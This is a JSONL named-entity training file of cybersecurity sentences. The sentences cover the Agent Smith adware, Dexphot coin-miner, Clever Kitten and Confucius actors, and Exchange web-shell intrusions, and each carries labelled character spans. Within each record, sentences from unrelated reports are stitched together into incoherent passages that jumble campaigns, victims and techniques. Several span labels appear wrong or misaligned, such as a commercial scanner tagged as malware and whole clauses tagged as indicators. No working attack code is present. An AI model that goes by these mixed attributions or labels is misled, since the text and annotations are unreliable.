"Organization"}]} {"text": "While investing a lot of resources in the development of this malware , the actor behind \u201c Agent Smith \u201d does not want a real update to remove all of the changes made , so here is where the \u201c patch \u201d module comes in to play With the sole purpose of disabling automatic updates for the infected application , this module observes the update directory for the original application and removes the file once it appears . Last week we discussed Numbered Panda , a group that is also based out of China and is fairly well known to the security community , though by many names . These executables are monitoring services for maintaining Dexphot \u2019s components . 
While there is a very large number of vulnerable websites , we already see some that have been injected with multiple different malicious code .", "spans": [{"start": 91, "end": 102, "label": "Malware"}, {"start": 441, "end": 455, "label": "Organization"}, {"start": 530, "end": 548, "label": "Organization"}, {"start": 632, "end": 639, "label": "Malware"}]} {"text": "Another trick in \u201c Agent Smith \u2019 s arsenal is to change the settings of the update timeout , making the original application wait endlessly for the update check . We revealed a Chinese-based adversary we crypt as Anchor Panda , a group with very specific tactics , techniques , and procedures ( TTPs ) and a keen interest in maritime operations and naval and aerospace technology . The now-malicious processes are released from suspension and run . We will continue to monitor these campaigns and in particular SocGholish to see if the web delivery landscape changes .", "spans": [{"start": 19, "end": 30, "label": "Malware"}, {"start": 213, "end": 225, "label": "Organization"}, {"start": 349, "end": 354, "label": "Organization"}, {"start": 359, "end": 379, "label": "Organization"}, {"start": 511, "end": 521, "label": "Organization"}]} {"text": "Figure 14 : disabling infected apps auto-update Figure 15 : changing the settings of the update timeout The Ad Displaying Payload Following all of the above , now is the time to take a look into the actual payload that displays ads to the victim . The campaign was active until January 2014 , but during our investigations the C&C servers were shut down . Next , the loader DLL E-TOOL targets the setup.exe file in SysWoW64 . 
Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks .", "spans": [{"start": 363, "end": 373, "label": "System"}, {"start": 374, "end": 384, "label": "System"}, {"start": 397, "end": 406, "label": "Indicator"}, {"start": 415, "end": 423, "label": "System"}, {"start": 426, "end": 438, "label": "Organization"}]} {"text": "In the injected payload , the module implements the method \u2018 callActivityOnCreate \u2019 . This week we are going to discuss Clever Kitten , whom , by virtue of several indicators , we have affiliated with the Islamic Republic of Iran . It removes setup.exe \u2019s contents and replaces them with the third decrypted executable , a cryptocurrency miner . Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": [{"start": 243, "end": 252, "label": "Indicator"}, {"start": 346, "end": 370, "label": "Organization"}]} {"text": "At any time an infected application will create an activity , this method will be called , and call \u2018 requestAd \u2019 from \u201c Agent Smith \u2019 s code . Clever Kitten has moved to leveraging strategic web compromises . Although Dexphot always uses a cryptocurrency miner of some kind , it \u2019s not always the same miner . Beginning in January 2021 , Mandiant Managed Defense observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment .", "spans": [{"start": 121, "end": 132, "label": "Malware"}, {"start": 144, "end": 157, "label": "Organization"}, {"start": 219, "end": 226, "label": "Malware"}, {"start": 339, "end": 363, "label": "Organization"}, {"start": 404, "end": 429, "label": "System"}]} {"text": "\u201c Agent Smith \u201d will replace the original application \u2019 s activities with an in-house SDK \u2019 s activity , which will show the banner received from the server . 
Clever Kitten actors have a strong affinity for PHP server-side attacks to make access ; this is relatively unique amongst targeted attackers who often favor targeting a specific individual at a specific organization using social engineering . It used different programs like XMRig and JCE Miner over the course of our research . The observed activity included creation of web shells for persistent access , remote code execution , and reconnaissance for endpoint security solutions .", "spans": [{"start": 2, "end": 13, "label": "Malware"}, {"start": 159, "end": 172, "label": "Organization"}, {"start": 338, "end": 348, "label": "Organization"}, {"start": 382, "end": 400, "label": "Organization"}, {"start": 435, "end": 440, "label": "Malware"}, {"start": 445, "end": 454, "label": "Malware"}]} {"text": "In the case of the infected application not specified in the code , \u201c Agent Smith \u201d will simply show ads on the activity being loaded . Clever Kitten primarily targets global companies with strategic importance to countries that are contrary to Iranian interests . The two monitoring services simultaneously check the status of all three malicious processes . Our investigation revealed that the files created on the Exchange servers were owned by the user NT AUTHORITY\\SYSTEM , a privileged local account on the Windows operating system .", "spans": [{"start": 70, "end": 81, "label": "Malware"}, {"start": 136, "end": 149, "label": "Organization"}, {"start": 392, "end": 537, "label": "Indicator"}]} {"text": "Figure 16 : integrating an in-house ad SDK Figure 17 : replacing original app activities with the malicious ad SDK activity Figure 18 : the malware showing ads on any activity being loaded Connecting the Dots As our malware sample analysis took the team closer to reveal the \u201c Agent Smith \u201d campaign in its entirety and it is here that the C & C server investigation enters the center stage . 
A Clever Kitten attack starts with the use of a web vulnerability scanner to conduct reconnaissance . Having dual monitoring services provides redundancy in case one of the monitoring processes is halted . Furthermore , the process that created the web shell was UMWorkerProcess.exe , the process responsible for Exchange Server \u2019s Unified Messaging Service .", "spans": [{"start": 395, "end": 408, "label": "Organization"}, {"start": 441, "end": 466, "label": "System"}, {"start": 613, "end": 675, "label": "Indicator"}, {"start": 706, "end": 750, "label": "System"}]} {"text": "We started with most frequently used C & C domains \u201c a * * * d.com \u201d , \u201c a * * * d.net \u201d , and \u201c a * * * d.org \u201d . The scanner was identified as the Acunetix Web Vulnerability Scanner which is a commercial penetration testing tool that is readily available as a 14-day trial . If any of the processes are terminated , the monitors immediately identify the situation , terminate all remaining malicious processes , and re-infect the device . In subsequent investigations , we observed malicious files created by w3wp.exe , the process responsible for the Exchange Server web front - end .", "spans": [{"start": 53, "end": 66, "label": "Indicator"}, {"start": 73, "end": 86, "label": "Indicator"}, {"start": 97, "end": 110, "label": "Indicator"}, {"start": 149, "end": 183, "label": "Malware"}, {"start": 511, "end": 519, "label": "System"}]} {"text": "Among multiple sub-domains , \u201c ad.a * * * d.org \u201d and \u201c gd.a * * * d.org \u201d both historically resolved to the same suspicious IP address . Once an exploitable page is identified , Clever Kitten will attempt to upload a PHP backdoor to gain remote access to the system . The monitoring components also detect freshly launched cmd.exe processes and terminate them promptly . 
In response to this activity , we built threat hunting campaigns designed to identify additional Exchange Server abuse .", "spans": [{"start": 31, "end": 47, "label": "Indicator"}, {"start": 56, "end": 72, "label": "Indicator"}, {"start": 324, "end": 331, "label": "Indicator"}, {"start": 412, "end": 436, "label": "Organization"}]} {"text": "The reverse DNS history of this IP brought \u201c ads.i * * * e.com \u201d into our attention . The reason for this is likely the availability of exploits against web browsers , which for a variety of reasons allows an attacker to bypass security features such as Data Execution Prevention ( DEP ) or Address Space Layout Randomization ( ASLR ) . As a final fail-safe , Dexphot uses schtasks.exe to create scheduled tasks . We also utilized this data to build higher - fidelity detections of web server process chains .", "spans": [{"start": 45, "end": 62, "label": "Indicator"}, {"start": 373, "end": 385, "label": "Indicator"}, {"start": 482, "end": 507, "label": "Organization"}]} {"text": "An extended malware hunting process returned to us a large set of \u201c Agent Smith \u201d dropper variants which helped us further deduce a relation among multiple C & C server infrastructures . Once an exploitable page is identified , the actor will attempt to upload a PHP backdoor to gain remote access to the system . This persistence technique is interesting , because it employs two distinct MITRE ATT&CK techniques : Scheduled Task and Signed Binary Proxy Execution . 
On March 2 , 2021 , Microsoft released a blog post that detailed multiple zero - day vulnerabilities used to attack on - premises versions of Microsoft Exchange Server .", "spans": [{"start": 68, "end": 79, "label": "Malware"}, {"start": 390, "end": 402, "label": "System"}, {"start": 416, "end": 430, "label": "System"}, {"start": 435, "end": 464, "label": "System"}, {"start": 487, "end": 496, "label": "Organization"}, {"start": 532, "end": 567, "label": "Vulnerability"}, {"start": 609, "end": 634, "label": "System"}]} {"text": "In a different period of the \u201c Agent Smith \u201d campaign , droppers and core modules used various combinations of the \u201c a * * * d \u201d and \u201c i * * * e \u201d domains for malicious operations such as prey list query , patch request and ads request . In Clever Kitten 's attacks , the goal is lateral movement ; this is an attempt to move further into the target environment in order to begin intelligence collection . The scheduled tasks call msiexec.exe as a proxy to run the malicious code , much like how msiexec.exe was used during installation . Microsoft also issued emergency Exchange Server updates for the following vulnerabilities : The activity reported by Microsoft aligns with our observations .", "spans": [{"start": 31, "end": 42, "label": "Malware"}, {"start": 431, "end": 442, "label": "Indicator"}, {"start": 496, "end": 507, "label": "Indicator"}, {"start": 539, "end": 548, "label": "Organization"}, {"start": 571, "end": 586, "label": "System"}, {"start": 656, "end": 665, "label": "Organization"}]} {"text": "With a bit of luck , we managed to find logs in which the evidence showed \u201c Agent Smith \u2019 s C & C front end routinely distributes a workload between \u201c w.h * * * g.com \u201d and \u201c tt.a * * * d.net \u201d . This activity is a longer tail for the actor than a spearphish ; this is likely based on the Clever Kitten background , which may be focused on web development/application testing . 
Using msiexec.exe , a legitimate system process , can make it harder to trace the source of malicious activity . FireEye currently tracks this activity in three clusters , UNC2639 , UNC2640 , and UNC2643 .", "spans": [{"start": 76, "end": 87, "label": "Malware"}, {"start": 151, "end": 166, "label": "Indicator"}, {"start": 175, "end": 191, "label": "Indicator"}, {"start": 384, "end": 395, "label": "Indicator"}, {"start": 491, "end": 498, "label": "Organization"}, {"start": 550, "end": 557, "label": "Organization"}, {"start": 560, "end": 567, "label": "Organization"}, {"start": 574, "end": 581, "label": "Organization"}]} {"text": "An in-depth understanding of the \u201c Agent Smith \u2019 s campaign C & C infrastructure enabled us to reach the conclusion that the owner of \u201c i * * * e.com \u201d , \u201c h * * * g.com \u201d is the group of hackers behind \u201c Agent Smith \u201d . Without going too deep into the rabbit hole , there are several indicators pointing to an Iranian nexus , including language artifacts in the tool-marks used by the attacker , as well as network activity tying this actor to a very specific location that we have high confidence in not being spoofed . Furthermore , the tasks allow Dexphot to conveniently update the payload from the web every time the tasks run . We recommend following Microsoft \u2019s guidance and patching Exchange Server immediately to mitigate this activity .", "spans": [{"start": 35, "end": 46, "label": "Malware"}, {"start": 134, "end": 149, "label": "Indicator"}, {"start": 156, "end": 169, "label": "Indicator"}, {"start": 205, "end": 216, "label": "Malware"}, {"start": 552, "end": 559, "label": "Malware"}]} {"text": "Figure 19 : C & C infrastructure diagram The Infection Landscape \u201c Agent Smith \u201d droppers show a very greedy infection tactic . 
Clever Kitten 's goal is to eventually be able to masquerade as a legitimate user by compromising credentials either through a pass-the-hash attack , or by dumping password hashes from a compromised host . They automatically update all of Dexphot \u2019s components , both upon system reboot as well as every 90 or 110 minutes while the system is running . Based on our telemetry , we have identified an array of affected victims including US - based retailers , local governments , a university , and an engineering firm .", "spans": [{"start": 67, "end": 78, "label": "Malware"}, {"start": 128, "end": 141, "label": "Organization"}, {"start": 367, "end": 374, "label": "Malware"}, {"start": 563, "end": 583, "label": "Organization"}, {"start": 586, "end": 603, "label": "Organization"}, {"start": 608, "end": 618, "label": "Organization"}, {"start": 628, "end": 644, "label": "Organization"}]} {"text": "It \u2019 s not enough for this malware family to swap just one innocent application with an infected double . The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries are also targeted . Dexphot also generates the names for the tasks at runtime , which means a simple block list of hardcoded task names will not be effective in preventing them from running . Related activity may also include a Southeast Asian government and Central Asian telecom .", "spans": [{"start": 192, "end": 196, "label": "Organization"}, {"start": 197, "end": 205, "label": "Organization"}, {"start": 316, "end": 323, "label": "Malware"}, {"start": 524, "end": 550, "label": "Organization"}, {"start": 555, "end": 576, "label": "Organization"}]} {"text": "It does so for each and every app on the device as long as the package names are on its prey list . 
There are new TTPs used in this attack \u2013 for example Agent_Drable is leveraging the Django python framework for command and control infrastructure , the technical details of which are outlined later in the blog . The names are usually in a GUID format , although after we released our first round of Dexphot-blocking protections , the threat authors began to use random strings . Microsoft reported the exploitation occurred together and is linked to a single group of actors tracked as \u201c HAFNIUM \u201d , a group that has previously targeted the US - based defense companies , law firms , infectious disease researchers , and think tanks .", "spans": [{"start": 184, "end": 190, "label": "System"}, {"start": 480, "end": 489, "label": "Organization"}, {"start": 589, "end": 596, "label": "Organization"}, {"start": 642, "end": 670, "label": "Organization"}, {"start": 673, "end": 682, "label": "Organization"}, {"start": 685, "end": 715, "label": "Organization"}, {"start": 722, "end": 733, "label": "Organization"}]} {"text": "Over time , this campaign will also infect the same device , repeatedly , with the latest malicious patches . n summary , Cold River is a sophisticated threat actor making malicious use of DNS tunneling for command and control activities , compelling lure documents , and previously unknown implants . The threat authors have one more evasion technique for these scheduled tasks : some Dexphot variants copy msiexec.exe to an arbitrary location and give it a random name , such as %AppData%\\.exe . 
As our experience with and knowledge of this threat actor grows , we will update this post or release new technical details as appropriate .", "spans": [{"start": 189, "end": 202, "label": "System"}, {"start": 386, "end": 393, "label": "Malware"}, {"start": 408, "end": 419, "label": "Indicator"}, {"start": 481, "end": 503, "label": "Indicator"}, {"start": 551, "end": 563, "label": "Organization"}]} {"text": "This lead us to estimate there to be over 2.8 billion infections in total , on around 25 Million unique devices , meaning that on average , each victim would have suffered roughly 112 swaps of innocent applications . Some of the exploit server paths contain modules that appear to have been designed to infect Linux computers , but we have not yet located the Linux backdoor . This makes the system process running malicious code a literal moving target . For our Managed Defense Customers , we have launched a Community Protection Event that will provide frequent updates on this threat actor and activity .", "spans": [{"start": 310, "end": 325, "label": "Organization"}, {"start": 464, "end": 489, "label": "Organization"}, {"start": 581, "end": 593, "label": "Organization"}]} {"text": "As an initial attack vector , \u201c Agent Smith \u201d abuses the 9Apps market \u2013 with over 360 different dropper variants . The campaign targets Middle Eastern organizations largely from the Lebanon and United Arab Emirates , though , Indian and Canadian companies with interests in those Middle Eastern countries may have also been targeted . Dexphot exhibits multiple layers of polymorphism across the binaries it distributes . 
Beginning in January 2021 , Mandiant Managed Defense observed the creation of web shells on one Microsoft Exchange server file system within a customer \u2019s environment .", "spans": [{"start": 32, "end": 43, "label": "Malware"}, {"start": 57, "end": 62, "label": "System"}, {"start": 201, "end": 214, "label": "Organization"}, {"start": 335, "end": 342, "label": "Malware"}, {"start": 449, "end": 473, "label": "Organization"}, {"start": 483, "end": 587, "label": "Indicator"}]} {"text": "To maximize profit , variants with \u201c MinSDK \u201d or \u201c OTA \u201d SDK are present to further infect victims with other adware families . The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated . For example , the MSI package used in the campaign contains different files , as shown in the table below . The web shell , named help.aspx ( MD5 : 4b3039cf227c611c45d2242d1228a121 ) , contained code to identify the presence of ( 1 ) FireEye xAgent , ( 2 ) CarbonBlack , or ( 3 ) CrowdStrike Falcon endpoint products and write the output of discovery .", "spans": [{"start": 132, "end": 147, "label": "System"}, {"start": 160, "end": 175, "label": "Vulnerability"}, {"start": 218, "end": 229, "label": "Organization"}, {"start": 233, "end": 243, "label": "Organization"}, {"start": 274, "end": 277, "label": "System"}, {"start": 364, "end": 395, "label": "Indicator"}, {"start": 398, "end": 436, "label": "Indicator"}, {"start": 441, "end": 483, "label": "Indicator"}, {"start": 490, "end": 504, "label": "Organization"}, {"start": 513, "end": 524, "label": "Organization"}, {"start": 536, "end": 554, "label": "Organization"}]} {"text": "The majority of droppers in 9Apps are games , while the rest fall into categories of adult entertainment , media player , photo utilities , and system utilities . 
The use of InPage as an attack vector is not commonly seen , with the only previously noted attacks being documented by Kaspersky in late 2016 . The MSI packages generally include a clean version of unzIP . The web shell was written to the system by the UMWorkerProcess.exe process , which is associated with Microsoft Exchange Server \u2019s Unified Messaging service .", "spans": [{"start": 28, "end": 33, "label": "System"}, {"start": 174, "end": 180, "label": "System"}, {"start": 283, "end": 292, "label": "Organization"}, {"start": 312, "end": 315, "label": "System"}, {"start": 362, "end": 367, "label": "System"}, {"start": 472, "end": 526, "label": "System"}]} {"text": "Figure 20 : dropper app category distribution Among the vast number of variants , the top 5 most infectious droppers alone have been downloaded more than 7.8 million times of the infection operations against innocent applications : Figure 21 : Top 5 most infectious droppers The \u201c Agent Smith \u201d campaign is primarily targeted at Indian users , who represent 59 % of the impacted population . The decoy documents dropped suggest that the targets are likely to be politically or militarily motivated , with subjects such as Intelligence reports and political situations being used as lure documents . exe , a password-protected ZIP file , and a batch file that checks for currently installed antivirus products . 
This activity suggested exploitation of CVE-2021 - 26858 .", "spans": [{"start": 281, "end": 292, "label": "Malware"}, {"start": 396, "end": 411, "label": "Malware"}, {"start": 462, "end": 473, "label": "Organization"}, {"start": 477, "end": 487, "label": "Organization"}, {"start": 547, "end": 556, "label": "Organization"}, {"start": 599, "end": 602, "label": "Indicator"}, {"start": 751, "end": 767, "label": "Vulnerability"}]} {"text": "Unlike previously seen non-GP ( Google Play ) centric malware campaigns , \u201c Agent Smith \u201d has a significant impact upon not only developing countries but also some developed countries where GP is readily available . While documents designed to exploit the InPage software are rare , they are not new \u2013 however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky . However , the batch file is not always present , and the names of the ZIP files and Loader DLLs , as well as the password for extracting the ZIP file , all change from one package to the next . Approximately twenty days later , the attacker placed another web shell on a separate Microsoft Exchange Server .", "spans": [{"start": 32, "end": 43, "label": "System"}, {"start": 76, "end": 87, "label": "Malware"}, {"start": 256, "end": 271, "label": "System"}, {"start": 326, "end": 332, "label": "Organization"}, {"start": 355, "end": 370, "label": "Vulnerability"}, {"start": 466, "end": 475, "label": "Organization"}, {"start": 562, "end": 573, "label": "System"}, {"start": 710, "end": 718, "label": "Organization"}, {"start": 758, "end": 783, "label": "System"}]} {"text": "For example , the US ( with around 303k infections ) , Saudi Arabia ( 245k ) , Australia ( 141k ) and the UK ( 137k ) . Confucius targeted a particular set of individuals in South Asian countries , such as military personnel and businessmen , among others . 
In addition , the contents of each Loader DLL E-TOOL differs from package to package , as does the encrypted data included in the ZIP file . This second , partially obfuscated web shell , named iisstart.aspx ( MD5 : 0fd9bffa49c76ee12e51e3b8ae0609ac ) , was more advanced and contained functions to interact with the file system .", "spans": [{"start": 206, "end": 224, "label": "Organization"}, {"start": 229, "end": 240, "label": "Organization"}, {"start": 293, "end": 299, "label": "System"}, {"start": 300, "end": 310, "label": "System"}, {"start": 468, "end": 506, "label": "Indicator"}, {"start": 570, "end": 585, "label": "System"}]} {"text": "Figure 22 : world infection heat map Considering that India is by far the most infected county by \u201c Agent Smith \u201d , overall compromised device brand distribution is heavily influenced by brand popularity among Indian Android users : Figure 23 : infected brand distribution While most infections occurred on devices running Android 5 and 6 , we also see a considerable number of successful attacks against newer Android versions . Tweety Chat 's Android version can record audio , too . This leads to the generation of a different ZIP archive and , in turn , a unique MSI package , each time the attacker bundles the files together . the web shell included the ability to run arbitrary commands and upload , delete , and view the contents of files .", "spans": [{"start": 100, "end": 111, "label": "Malware"}, {"start": 217, "end": 224, "label": "System"}, {"start": 323, "end": 338, "label": "System"}, {"start": 411, "end": 418, "label": "System"}, {"start": 430, "end": 441, "label": "System"}, {"start": 465, "end": 477, "label": "Malware"}, {"start": 530, "end": 541, "label": "System"}, {"start": 567, "end": 570, "label": "System"}]} {"text": "It is a worrying observation . 
Confucius' operations include deploying bespoke backdoors and stealing files from their victim 's systems with tailored file stealers , some of which bore resemblances to Patchwork 's . Because of these carefully designed layers of polymorphism , a traditional file-based detection approach wouldn\u2019t be effective against Dexphot . While the use of web shells is common amongst threat actors , the parent processes , timing , and victim(s ) of these files clearly indicate activity that commenced with the abuse of Microsoft Exchange .", "spans": [{"start": 202, "end": 211, "label": "Organization"}, {"start": 352, "end": 359, "label": "Malware"}, {"start": 494, "end": 563, "label": "Indicator"}]} {"text": "AOSP patched the Janus vulnerability since version 7 by introducing APK Signature Scheme V2 . Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . Besides tracking the files and processes that Dexphot uses to execute an attack , we have also been monitoring the domains used to host malicious payloads . 
In March 2021 , in a separate environment , we observed a threat actor utilize one or more vulnerabilities to place at least one web shell on the vulnerable Exchange Server .", "spans": [{"start": 17, "end": 22, "label": "Vulnerability"}, {"start": 106, "end": 115, "label": "Organization"}, {"start": 285, "end": 298, "label": "Vulnerability"}, {"start": 303, "end": 317, "label": "Vulnerability"}, {"start": 366, "end": 373, "label": "Malware"}, {"start": 496, "end": 518, "label": "System"}, {"start": 533, "end": 547, "label": "Organization"}, {"start": 619, "end": 649, "label": "Vulnerability"}]} {"text": "However , in order to block Janus abuse , app developers need to sign their apps with the new scheme so that Android framework security component could conduct integrity checks with enhanced features . Back in February , we noted the similarities between the Patchwork and Confucius groups and found that , in addition to the similarities in their malware code , both groups primarily went after targets in South Asia . The URLs used for hosting all follow a similar pattern . This was likely to establish both persistence and secondary access , as in other environments .", "spans": [{"start": 28, "end": 33, "label": "Vulnerability"}, {"start": 109, "end": 116, "label": "System"}, {"start": 259, "end": 268, "label": "Organization"}, {"start": 273, "end": 289, "label": "Organization"}]} {"text": "Figure 25 : infected Android version distribution To further analyze \u201c Agent Smith \u201d \u2019 s infection landscape , we dived into the top 10 infected countries : Country Total Devices Total Infection Event Count Avg . Back in February , Trend Micro noted the similarities between the Patchwork and Confucius groups and found that , in addition to the similarities in their malware code , both groups primarily went after targets in South Asia . 
The domain address usually ends in a .info or .net TLD , while the file name for the actual payload consists of random characters , similar to the randomness previously seen being used to generate file names and scheduled tasks . In this case , Mandiant observed the process w3wp.exe , ( the IIS process associated with the Exchange web front - end ) spawning cmd.exe to write a file to disk .", "spans": [{"start": 21, "end": 28, "label": "System"}, {"start": 71, "end": 82, "label": "Malware"}, {"start": 232, "end": 243, "label": "Organization"}, {"start": 279, "end": 288, "label": "Organization"}, {"start": 293, "end": 309, "label": "Organization"}, {"start": 477, "end": 482, "label": "Indicator"}, {"start": 486, "end": 490, "label": "Indicator"}, {"start": 685, "end": 693, "label": "Organization"}, {"start": 707, "end": 831, "label": "Indicator"}]} {"text": "App Swap Per Device Avg . One of its file stealers , swissknife2 , abuses a cloud storage service as a repository of exfiltrated files . Many of the URLs listed were in use for an extended period . The file , matches signatures for the tried - and - true China Chopper .", "spans": [{"start": 53, "end": 64, "label": "System"}, {"start": 67, "end": 97, "label": "Malware"}, {"start": 232, "end": 268, "label": "Organization"}]} {"text": "Droppers Per Device Avg . During the months that followed in which we tracked Confucius' activities , we found that they were still aiming for Pakistani targets . However , the MSI packages hosted at each URL are frequently changed or updated . 
We observed that in at least two cases , the threat actors subsequently issued the following command against the Exchange web server : This command attempts to delete the administrator user from the Exchange Organizations administrators group , beginning with the Domain Controller in the current domain .", "spans": [{"start": 177, "end": 180, "label": "System"}, {"start": 358, "end": 377, "label": "System"}]} {"text": "Months Device Remained Infected India 15,230,123 2,017,873,249 2.6 1.7 2.1 Bangladesh 2,539,913 208,026,886 2.4 1.5 2.2 Pakistan 1,686,216 94,296,907 2.4 1.6 2 Indonesia 572,025 67,685,983 2 1.5 2.2 Nepal 469,274 44,961,341 2.4 1.6 2.4 US 302,852 19,327,093 1.7 1.4 1.8 Nigeria 287,167 21,278,498 2.4 1.3 2.3 Hungary 282,826 7,856,064 1.7 1.3 1.7 Saudi Arabia 245,698 18,616,259 2.3 During their previous campaign , we found Confucius using fake romance websites to entice victims into installing malicious Android applications . In addition , every few days more domains are generated to host more payloads . If the system is in a single - system domain , it will execute on the local computer .", "spans": []} {"text": "1.6 1.9 Myanmar 234,338 9,729,572 1.5 1.4 1.9 \u201c Agent Smith \u201d Timeline Early signs of activity from the actor behind \u201c Agent Smith \u201d can be traced back to January 2016 . Periodically , the malware tries to contact the Command-and-Control ( C&C ) server with the username encoded into parameters . After a few months of monitoring , we were able to identify around 200 unique Dexphot domains . Per Microsoft \u2019s blog , they have identified additional post - exploitation activities , including : \u2022 Compression of data for exfiltration via 7 - Zip . 
\u2022 Use of Exchange PowerShell Snap - ins to export mailbox data .", "spans": [{"start": 48, "end": 59, "label": "Malware"}, {"start": 218, "end": 237, "label": "System"}, {"start": 375, "end": 382, "label": "Malware"}, {"start": 397, "end": 409, "label": "Organization"}]} {"text": "We classify this 40-month period into three main stages . This function is similar to the various versions of backdoors ( such as sctrls and sip_telephone ) that we analyzed in our previous blog post and whitepaper . Dexphot is not the type of attack that generates mainstream media attention ; it \u2019s one of the countless malware campaigns that are active at any given time . \u2022 Use of additional offensive security tools Covenant , Nishang , and PowerCat for remote access .", "spans": [{"start": 130, "end": 136, "label": "System"}, {"start": 141, "end": 154, "label": "System"}, {"start": 217, "end": 224, "label": "Malware"}]} {"text": "January 2016 \u2013 May 2018 : In this stage , \u201c Agent Smith \u201d hackers started to try out 9Apps as a distribution channel for their adware . This algorithm was previously discussed by security researchers in a Confucius-related blog post . Its goal is a very common one in cybercriminal circles \u2014 to install a coin miner that silently steals computer resources and generates revenue for the attackers \u2014 yet Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats , intent on evading protections and motivated to fly under the radar for the prospect of profit . 
The activity we have observed , coupled with others in the information security industry , indicate that these threat actors are likely using Exchange Server vulnerabilities to gain a foothold into environments .", "spans": [{"start": 44, "end": 55, "label": "Malware"}, {"start": 402, "end": 409, "label": "Malware"}, {"start": 702, "end": 715, "label": "Organization"}, {"start": 720, "end": 801, "label": "Indicator"}]} {"text": "During this period , malware samples display some typical adware characteristics such as unnecessary permission requirements and pop-up windows . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . To combat threats , several next-generation protection engines in Microsoft Defender Advanced Threat Protection \u2019s antivirus component detect and stop malicious techniques at multiple points along the attack chain . This activity is followed quickly by additional access and persistent mechanisms .", "spans": [{"start": 136, "end": 143, "label": "System"}, {"start": 155, "end": 164, "label": "Organization"}, {"start": 191, "end": 200, "label": "Malware"}, {"start": 212, "end": 225, "label": "Vulnerability"}, {"start": 294, "end": 339, "label": "System"}, {"start": 343, "end": 362, "label": "System"}]} {"text": "During this time , \u201c Agent Smith \u201d hackers eventually built up a vast number of app presence on 9Apps , which later would serve as publication channels for evolved droppers . The group still uses the Badnews malware , a backdoor with information-stealing and file-executing capabilities , albeit updated with a slight modification in the encryption routine at the end of 2017 , when they added Blowfish encryption on top of their custom encryption described in our former Patchwork blogpost . For Dexphot , machine learning-based detections in the cloud recognize and block the DLLs loaded by rundll32.exe , stopping the attack chain in its early stages . 
We recommend checking the following for potential evidence of compromise : \u2022 Child processes of on Exchange Servers , particularly .", "spans": [{"start": 21, "end": 32, "label": "Malware"}, {"start": 96, "end": 101, "label": "System"}, {"start": 200, "end": 215, "label": "System"}, {"start": 472, "end": 481, "label": "Organization"}, {"start": 497, "end": 504, "label": "Malware"}, {"start": 578, "end": 582, "label": "System"}, {"start": 593, "end": 605, "label": "Indicator"}]} {"text": "However , samples don \u2019 t have key capabilities to infect innocent apps on victim devices yet . Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions \u2014 which are often not designed to handle the persistent and sophisticated threats detailed in this blog \u2014 ineffective . Memory scans detect and terminate the loading of malicious code hidden by process hollowing \u2014 including the monitoring processes that attempt to update the malware code and re-infect the machine via PowerShell commands . \u2022 New , unexpected compiled ASPX files in the directory \u2022 Reconnaissance , vulnerability - testing requests to the following resources from an external IP address : In our investigations to date , the web shells placed on Exchange Servers have been named differently in each intrusion , and thus the file name alone is not a high - fidelity indicator of compromise .", "spans": [{"start": 115, "end": 124, "label": "Organization"}, {"start": 129, "end": 138, "label": "Organization"}, {"start": 452, "end": 469, "label": "System"}, {"start": 577, "end": 587, "label": "System"}, {"start": 657, "end": 761, "label": "Indicator"}, {"start": 821, "end": 837, "label": "System"}, {"start": 854, "end": 963, "label": "Indicator"}]} {"text": "May 2018 to April 2019 : This is the actual mature stage of \u201c Agent Smith \u201d campaign . 
The reality is that IT departments of small to large-sized organizations are not equipped to handle the more advanced threats that groups like Confucius use in their attacks . Behavioral blocking and containment capabilities are especially effective in defeating Dexphot \u2019s fileless techniques , detection evasion , and persistence mechanisms , including the periodic and boot-time attempts to update the malware via scheduled tasks . If you believe your Exchange Server was compromised , we recommend investigating to determine the scope of the attack and dwell time of the threat actor .", "spans": [{"start": 62, "end": 73, "label": "Malware"}, {"start": 107, "end": 121, "label": "Organization"}, {"start": 350, "end": 357, "label": "Malware"}, {"start": 542, "end": 557, "label": "System"}]} {"text": "From early 2018 prior to May , \u201c Agent Smith \u201d hackers started to experiment with Bundle Feng Shui , the key tool which gives \u201c Agent Smith \u201d malware family capabilities to infect innocent apps on the device . Patchwork uses email as an entry point , which is why securing the email gateway is important . As mentioned , given the complexity of the attack chain and of Dexphot \u2019s persistence methods , we released a remediation solution that prevents re-infection by removing artifacts . Furthermore , as system and web server logs may have time or size limits enforced , we recommend preserving the following artifacts for forensic analysis : \u2022 At least 14 days of HTTP web logs from the directories ( include logs from all subdirectories ) \u2022", "spans": [{"start": 33, "end": 44, "label": "Malware"}, {"start": 128, "end": 139, "label": "Malware"}, {"start": 210, "end": 219, "label": "Organization"}, {"start": 369, "end": 376, "label": "Malware"}, {"start": 505, "end": 531, "label": "System"}]} {"text": "A series of pilot runs were executed . 
This blog post examines two similar malware families that utilize the aforementioned technique to abuse legitimate websites , their connections to each other , and their connections to known espionage campaigns . The detection , blocking , and remediation of Dexphot on endpoints are exposed in Microsoft Defender Security Center , where Microsoft Defender ATP \u2019s rich capabilities like endpoint detection and response , automated investigation and remediation , and others enable security operations teams to investigate and remediate attacks in enterprise environments . The contents of the Exchange Web Server ( also found within the folder ) \u2022 At least 14 days of Exchange Control Panel ( ECP ) logs , located in We have found significant hunting and analysis value in these log folders , especially for suspicious CMD parameters in the ECP Server logs .", "spans": [{"start": 298, "end": 305, "label": "Malware"}, {"start": 334, "end": 368, "label": "System"}, {"start": 377, "end": 399, "label": "System"}, {"start": 632, "end": 651, "label": "System"}, {"start": 707, "end": 742, "label": "System"}, {"start": 880, "end": 895, "label": "System"}]} {"text": "After some major upgrade , by mid-June , the \u201c Agent Smith \u201d campaign reached its peak . In order to increase the likelihood of their malware successfully communicating home , cyber espionage threat actors are increasingly abusing legitimate web services , in lieu of DNS lookups to retrieve a command and control address . With these capabilities , Microsoft Defender ATP provides comprehensive protection against Dexphot and the countless other complex and evolving threats that we face every day . 
